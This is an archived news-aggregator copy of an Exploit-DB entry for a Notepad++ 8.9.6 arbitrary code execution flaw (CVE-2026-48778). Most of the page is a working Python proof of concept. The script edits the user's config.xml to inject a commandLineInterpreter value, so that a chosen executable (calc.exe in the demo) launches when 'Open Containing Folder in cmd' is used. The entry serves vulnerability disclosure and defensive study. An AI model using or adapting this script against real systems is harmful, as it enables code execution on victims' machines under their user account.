CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ⬡ Vulnerabilities & CVEs Jun 01, 2026

[remote] Notepad++ 8.9.6 - Arbitrary Code Execution

Exploit DB Archived Jun 01, 2026 ✓ Full text saved

Notepad++ 8.9.6 - Arbitrary Code Execution

Full text archived locally
✦ AI Summary · Claude Sonnet


    EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Notepad++ 8.9.6 - Arbitrary Code Execution EDB-ID: 52606 CVE: 2026-48778 EDB Verified: Author: KAVIN JINDAL Type: REMOTE Exploit:   /   Platform: WINDOWS Date: 2026-05-30 Vulnerable App: # Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution # Date: 2026-05-30 # Exploit Author: Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal/ # Vendor Homepage: https://notepad-plus-plus.org # Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/ # Version: <= 8.9.6 # Tested on: Windows 10/11 # CVE: CVE-2026-48778 # Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9 # # Description: # Notepad++ reads <GUIConfig name="commandLineInterpreter"> from config.xml without # validation and passes it to ShellExecute when "Open Containing Folder in cmd" is # triggered. An attacker with write access to %APPDATA%\Notepad++\ can inject an # arbitrary executable path, resulting in code execution under the current user context. # In the following script, `calc.exe` has been used to demonstrate this vulnerability. import os, sys appdata = os.environ["APPDATA"] if not appdata: print("[!] APPDATA environment variable not found, exiting..") sys.exit() config_path = os.path.join(appdata, "Notepad++", "config.xml") existing = os.path.exists(config_path) if existing==True: print("[+] Found config.xml at ", config_path) else: print("config.xml not found. Ensure Notepad++ is installed and has been launched atleast once.") x = open(config_path, 'r') s = x.readlines() payload='<GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>\n' injected=False for num,i in enumerate(s, start=0): if '<GUIConfig name="commandLineInterpreter">' in i: print("[!] Injecting payload..") s[num]=payload injected=True break elif "</GUIConfigs>" in i: print("[!] Injecting payload..") s.insert(num, payload) injected=True break if not injected: print("[!] Payload injection failed.") sys.exit(1) y = open(config_path, 'w') y.writelines(s) print("[+] Payload injected successfully!") print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd") print("[+] Calc.exe will launch instead of cmd.") print("end") Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services
    💬 Team Notes
    Article Info
    Source
    Exploit DB
    Category
    ⬡ Vulnerabilities & CVEs
    Published
    Jun 01, 2026
    Archived
    Jun 01, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗